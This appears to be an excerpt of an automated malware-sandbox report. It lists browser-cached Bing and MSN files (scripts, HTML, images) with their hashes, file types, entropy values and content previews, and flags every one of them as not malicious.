                                                                                                    SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                                                    SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/9IaydF5GN9iBQi04x3gMBBYYFoo.js
                                                                                                    Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (14556), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14575
                                                                                                    Entropy (8bit):5.276460320889932
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2Hune5nXDwVMwraBEVw0R/5fA+PKN0etAXVM+iwEv61J:2Hun6nX0naBEW0R/FDuRqXawEviJ
                                                                                                    MD5:E4A47339EFFE4B794768D0003D047639
                                                                                                    SHA1:AA46FEB160A438B7C83E10D50B116CC02A6916B6
                                                                                                    SHA-256:ABEE06196571EF5177889710CD9C7D748B11E054BB5469C097A747AC399D6886
                                                                                                    SHA-512:993E5E27230F8831DDFF140735ECACFCC831FC2712A4EADAD36D1C3E8799609E2FE13D904ECF01AB9286BC085F81B3B26792D382103496402105DB215B5AB941
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<div class="na_cai" url="https://www.msn.com/en-us/technology/tech-companies/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-total-neural-enterprises/ar-AA1wnuyp" titletext="Early Microsoft leaders go all in on AI with Seattle-area startup Total Neural Enterprises" data-priority="2"><div class="na_card_wrp na_ccw_wrp" data-priority="2"><a class="na_ccw tc r_img" url="https://www.msn.com/en-us/technology/tech-companies/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-total-neural-enterprises/ar-AA1wnuyp" data-priority="2" titletext="Early Microsoft leaders go all in on AI with Seattle-area startup Total Neural Enterprises" href="https://www.msn.com/en-us/technology/tech-companies/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-total-neural-enterprises/ar-AA1wnuyp?ocid=BingNewsSerp" h="ID=NEWS.401_0,5008.1"><div class="citm_img"><div class="imagewrap"><img title="Early Microsoft leaders go all in on AI with Seattle-area startup Total N
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 86 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1272
                                                                                                    Entropy (8bit):7.739655473272039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B8w+N44kvN+26z6C662MSVta3R/9Cwu7a548Zs0MpybNCz:p+8vAq5UBowvS8Zs0Mpybwz
                                                                                                    MD5:AE5C74DAFC9C8E750A0C011A0A0C58D1
                                                                                                    SHA1:12ABB814204FC5A6E5130A97EAB94C490A19829C
                                                                                                    SHA-256:D62972B8E0BAB842794D2E274D42922D5912AE160071584681AA6367B6956421
                                                                                                    SHA-512:A755E42CB8DC14C4DE09CC27A56CB55F2232EC280C668DCF41DC128D7F6C3534B9D0ADBE5A905BF8A6C62D97E2A10DA33136BBADC044B09A3153109B93C6B5CB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...V..........CJf....sRGB.........gAMA......a.....pHYs..........o.d....IDATXG..w.os...s.}......"%...WvD.!.P.0.e..R.G.B..Y...9....w].......w...w.w<..y.i..~..)i...=7........m.*[._..m...g.....V./..N..1D..5..?.01....'...|...vt.1..........V...3.....t.f.pT0.a.@+.s..Vf......0.......N.......S..g..~ ..c.pP8<.......:..9a.0g.;...7..>........tI....U..`!...u..{........g...`b...l...wv..`,..y..n.1..~.6.P.&........0.....w.,...Gx?..@..2.>.....zcp8...s.`d."|..Y.bp.tq.56....h.}....^.Y.ca..4.....Bx<..D..Av<.Fuw..%.^...T.p.M/...........I...@.....~.W..o.-.^........ .;..f..x/...a.....v...)T........s.G... ]..O......N.I..D0.G{f. J./.H.X..s..0.=.P......E..G....F.X...R....K..wm .8tl...#%N..^.......a.x.... .-.)..*b-.D...A..Ni.&Y.G.q.-.C uS&..G.C.7X...X.I.s...4..?.c..,.X.$9....vHl..]0.}.....@J.{....~.quU_f+g.!......+.}.........Zc...(..w.VJ.....:q..Y...[...O0D..A.X5R..8Vts.....M.x.i.z.@[...NQK......$..*C..F.{n...J.L.._.u.)!M..Rw......t.<NW..D.].n.J...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (19806), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19806
                                                                                                    Entropy (8bit):5.331074826853414
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3WsjV9Npzk8fbw3QMXmwOAahGvyBJeXiOOF240eApyfYRxW+:3zVPpzkLXmw0onXi9F24Ypw43
                                                                                                    MD5:1CA891F499366C455EB94F8FFB96E86B
                                                                                                    SHA1:1F7236D20DE8985F624B610F51207E1F92F93A1A
                                                                                                    SHA-256:D80F772080A164CFC69E2B7947494B0FF23AF81D2CEDC06B492ED0A0149FBFF2
                                                                                                    SHA-512:17EDCE9121AC55B16515EDC8EA278307C2D0C1615EF5D54236FB8BAD0F853B85838D69EC063210938B83F9D2AE36AE73E88A12FD8F25022523B71C0F4251735B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3540
                                                                                                    Entropy (8bit):7.8536895040058665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TME4jUlDyqHY6MZkCyuRxyhlUwZTVHNVs3s/n:QOlDyY52kGuHNVLs3sP
                                                                                                    MD5:CE6ABEF966356634465962F3576211F7
                                                                                                    SHA1:F0725A1600193C289FD9FE9BDE4D24EE3477488D
                                                                                                    SHA-256:173ED060BEB3C81EA85691B778547C66A1CF9A41E7F79A0B6970E56C1FD5F816
                                                                                                    SHA-512:E5675D83EC74ACEC1D973249327C9C073F60FC137B74D2EAC4194022725A2AD41490CD25AF0A1AC75B6768D92FF7A1A92096F5D0AFDF98533043C6121887CCB0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OVFT.9NsiR7X_jKJm7jAbPHh51i&pid=News&w=80&h=80&c=14&rs=2&qlt=90
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+..WQ...1.....u.w>Q.P.5.s.?.V......T].)..j.?...=O.w.7..x.,R.P{7....#|.>.A.{.....~..j^".....G....#.U5k.%.y.).D.>q..S..?h..<++...I..".?Z.5..|;.F.7...g.....2:..*..A..~..Scs......F......Y._d...........$..._u.....6..........Y6.].?<n.i?.cV,.;.^`...zy6r>.!_...3...r.}.B..V".I.6V.06...9..y.M.g..O23...L.<...s..)Z...d...r...h.....G.V...>..../Z.>..?.,U.[....4;.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (32333)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):50356
                                                                                                    Entropy (8bit):5.4809585064576964
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2s2r/qO7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATC:9ETqSjyK4FWCqbwONiYb55t7
                                                                                                    MD5:147F57C8B871D1784F7D75DA4393B8D1
                                                                                                    SHA1:59A9141AC6DBB98329A825908780725AEF8F768F
                                                                                                    SHA-256:CE8409DD6D559B263B77813EB672BB275BC4A13589B1A62AE08DB0D9FAE55C91
                                                                                                    SHA-512:D79CF6150EE259DFD1A96AFB97E8650B92DF2EE265297673F6298AD3824E56CB7D85FC9AEAC91E29CFA0965E3F3555C46423C72338F7022A29FA4D3D3C40F047
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/images/sbi?mmasync=1&ig=33097A094B7E4685822C3A3929157F3C&iid=.5100&ptn=Web&ep=0&iconpl=1
                                                                                                    Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:18px;width:18px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (15088), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15088
                                                                                                    Entropy (8bit):5.189911346037812
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:WHTUQdwUKASrMxdhuCMnirx/hN3AjXcn1bkoDLw2USsUeye:WHwqI4/QjozKi5e
                                                                                                    MD5:6100D2A3324E8EFD4DA73EC7101F3000
                                                                                                    SHA1:CB9987C5BBA13D8FE33F0B420155AEE4E8CED2D1
                                                                                                    SHA-256:75EB6620C2B15BBBDFDA091DBAEF7B9DB040DB70DE388C30EC9DF68BBC33DDAC
                                                                                                    SHA-512:4DB99F39035ADBF3688FF934600817FD52DCD048B7A7FB2A5050D4376861F966EE11CA13F1744ADEEE3F3B1D620683853B64B36F6A88F28D65EAEBE4B7346FDC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var SlideExperienceLite;(function(n){function h(n,t,i,r,u,f,e,o,h,c,l,a,v,y,p,w,b){var k=new s(n,t,i,r,f,e,o,h,c,l,a,v,y,p,w,b);k.init()}function t(){sj_evt.fire("lazyLdImg")}var i=_G.RTL,u=i?"marginRight":"marginLeft",e=i?"paddingRight":"paddingLeft",f="narrpole",o=1004,s=function(){function n(n,t,r,u,f,e,o,s,h,c,l,a,v,y,p,w){var k,b;if(this.swipeThreshold=50,this.firstSlideOffsetLeft=4,this.activeSlideIndex=0,this.enableCopyText=!1,this.scrolling=!1,this.id=n,this.controlId=t,this.bar=_ge(t),this.bar){if(this.control=_ge(this.bar.id+"c"),this.viewport=this.getViewPortParent(this.bar)||this.bar.parentElement,!this.viewport)return;if(this.dirMultiplier=!i||sb_ie?1:-1,this.showChevronAllTime=f,this.hideChevronsOnStart=s,this.paddingBuffer=h&&r?this.computePaddingBuffer():0,this.appns=this.control.getAttribute("data-appns"),this.kvalue=this.control.getAttribute("data-k"),this.slideExpType=r?"Carousel":"SlideShow",this.slideRightMargin=u,this.totalSlides=this.bar.childElementCount,this.to
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (19008)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):316988
                                                                                                    Entropy (8bit):5.239088634343518
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:vLKLj7yjWF276GNg9fpe3HdabIKSB1DkCXW8o0oMlppfbm:zgj7bSB1DkCXW8T5dbm
                                                                                                    MD5:8192D891E754AFD81A399F98BC6B265F
                                                                                                    SHA1:965E6C69F45118FEAB86EEEBBB0FC4964F2B3A98
                                                                                                    SHA-256:E2E4D97C20D4478E8E947480C8F6C71A2C795776D405366BE70DB82E4EA4BA77
                                                                                                    SHA-512:7C2712A1E34DA9062F50E7D93F4E74772044E45C265C682ABCD4E28E4004DCDAF6CE7479A4E8785986A88A32257E4FAC0ECF8CE23AFE47968C4510DF0A2C800B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:/*! @azure/msal-browser v2.28.2 2022-09-06 */."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).msal={})}(this,(function(e){./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR. OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5944
                                                                                                    Entropy (8bit):7.819206752415454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                    MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                    SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                    SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                    SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3814
                                                                                                    Entropy (8bit):7.634659202076907
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                    MD5:281570611F89219A970F2589F98A09DB
                                                                                                    SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                    SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                    SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (5225), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):5225
                                                                                                    Entropy (8bit):5.247423394115619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZvfHI20RQLNlcgmjm1+VD8FLB8syw0CaCOoy5cjvvmmij0pDRRw3KTYZO6iJsA:9fHIWLJmjmsU8Gt7HDvJiQpAOtJsA
                                                                                                    MD5:C3B18F8470631D6C1B7CBFE9BB1ED969
                                                                                                    SHA1:001C2F621E5166084FED4E6A282AA0547BF98676
                                                                                                    SHA-256:231B3405BFA830CE8D7263208D14EDBF1F1AB20D74D0527BE2A29D955E1A694B
                                                                                                    SHA-512:9BD39AE7292CE3CF5AEEBAF7FE57BFB63C91079BDA76CF1DCB38311300D096FEB1BAD1DC11B8031A0175CA6314270566162D7991CF3B0A2FF23868AFF0EB7B6B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/ABwvYh5RZghP7U5qKCqgVHv5hnY.js
                                                                                                    Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},IDBbOv,EIHB,IFrameOverlay;(function(n){function tt(i){t.src?n.hasMms()&&t.contentWindow.location.href!==o||t.contentWindow.location.replace(i):t.src=i}function it(){var n=_w.IDPTit;n&&(t.setAttribute("title",n),t.setAttribute("name",n))}function b(n){p=n?wt:null}function rt(n){c.parentElement.style.overflow=n?"":"hidden"}function v(n){t.style.display=n?"block":"none"}function k(n){n===void 0&&(n=!0);var f=at(t);f&&PageEvents.logUnload("back",f);b(!1);gt();n&&ct();i="";w||(u||(u=rt),u(!0));v(!1);lt();window.focus();r=!1;sj_ue(_d,"keyup",ft);sj_ue(_w,"click",et);s&&sessionStorage.removeItem(l)}function ct(){tt(o);t.setAttribute("name",h);i&&t.classList.remove(i)}function lt(){sj_evt.fire("IFrame.Close")}function at(n){try{return n.contentWindow._G.IG}catch
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (5225), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5225
                                                                                                    Entropy (8bit):5.247423394115619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZvfHI20RQLNlcgmjm1+VD8FLB8syw0CaCOoy5cjvvmmij0pDRRw3KTYZO6iJsA:9fHIWLJmjmsU8Gt7HDvJiQpAOtJsA
                                                                                                    MD5:C3B18F8470631D6C1B7CBFE9BB1ED969
                                                                                                    SHA1:001C2F621E5166084FED4E6A282AA0547BF98676
                                                                                                    SHA-256:231B3405BFA830CE8D7263208D14EDBF1F1AB20D74D0527BE2A29D955E1A694B
                                                                                                    SHA-512:9BD39AE7292CE3CF5AEEBAF7FE57BFB63C91079BDA76CF1DCB38311300D096FEB1BAD1DC11B8031A0175CA6314270566162D7991CF3B0A2FF23868AFF0EB7B6B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},IDBbOv,EIHB,IFrameOverlay;(function(n){function tt(i){t.src?n.hasMms()&&t.contentWindow.location.href!==o||t.contentWindow.location.replace(i):t.src=i}function it(){var n=_w.IDPTit;n&&(t.setAttribute("title",n),t.setAttribute("name",n))}function b(n){p=n?wt:null}function rt(n){c.parentElement.style.overflow=n?"":"hidden"}function v(n){t.style.display=n?"block":"none"}function k(n){n===void 0&&(n=!0);var f=at(t);f&&PageEvents.logUnload("back",f);b(!1);gt();n&&ct();i="";w||(u||(u=rt),u(!0));v(!1);lt();window.focus();r=!1;sj_ue(_d,"keyup",ft);sj_ue(_w,"click",et);s&&sessionStorage.removeItem(l)}function ct(){tt(o);t.setAttribute("name",h);i&&t.classList.remove(i)}function lt(){sj_evt.fire("IFrame.Close")}function at(n){try{return n.contentWindow._G.IG}catch
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1898
                                                                                                    Entropy (8bit):5.157798792628297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:zjyVW/s7StTJEH9cgpbBNzH9o+bX8WH9jFH9bEu9h2e:qVYQJXb78WXj
                                                                                                    MD5:1E1DEA49A39DB57297EB87F0793184DA
                                                                                                    SHA1:E403E863BC213515DA652DF659E00CE352F9FB18
                                                                                                    SHA-256:136E085FE5E3342897A4506B3F7237C86CD48DEE44F743DB7315D8A23B464301
                                                                                                    SHA-512:413D4633D807A31762123DC35F46AE4139CF45DF0D4480EF84A8B1FF9DF61C7F557F01CDF504E568E487CB57889DE2AF06ECEB672516F69D6467CE098573C715
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" xmlns:v="https://vecta.io/nano"><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" fill="#fff"/><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" stroke="#e5e5e5" stroke-width=".5"/><path d="M6.277 4.254c-.198.245-.296.556-.274.87v13.751c-.021.317.084.63.292.87l.044.05 7.684-7.702v-.187L6.32 4.211l-.044.044z" fill="url(#A)"/><path d="M16.572 14.659l-2.549-2.567v-.187l2.549-2.568.056.037 3.052 1.728c.87.491.87 1.299 0 1.797l-3.04 1.728-.068.031z" fill="url(#B)"/><path d="M16.646 14.63L14.023 12l-7.746 7.746c.176.156.401.246.636.254s.465-.067.651-.211l9.083-5.16z" fill="url(#C)"/><path d="M16.646 9.376l-9.083-5.16a1 1 0 0 0-1.287.037l7.746 7.746 2.624-2.623z" fill="url(#D)"/><defs><linearGradient id="A" x1="13.339" y1="4.982" x2="2.907" y2="15.413" gradientUnits="userSpaceOnUse"><stop stop-color="#00a0ff"/><stop offset=".01" stop-color="#00a1ff"/><stop offset=".26" stop-color="#00beff"/><stop of
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (32333)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50356
                                                                                                    Entropy (8bit):5.4831018521386525
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2s2r/EO7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATU:9ETESjyK4FWCqbwONiYb55Jh
                                                                                                    MD5:847DFA68F79937B95D7C292139DDFC07
                                                                                                    SHA1:81D9D559E3F3CF4C3B23851E8536F01DA22E5C3F
                                                                                                    SHA-256:8C5E1F784237BD0392E61015D94A5B15CE50C423FE011E78C222488BFA78E8F9
                                                                                                    SHA-512:173DDA381DF7BA020F861D38FBCD594ED2303F1B810E1FFBBF1E3BE66A4E45140746483084B6CDA47E5CA25E0906F18F0E8ADBB7F5D8743D8D8670F81BC6D4AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:18px;width:18px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):576
                                                                                                    Entropy (8bit):5.192163014367754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                    MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                    SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
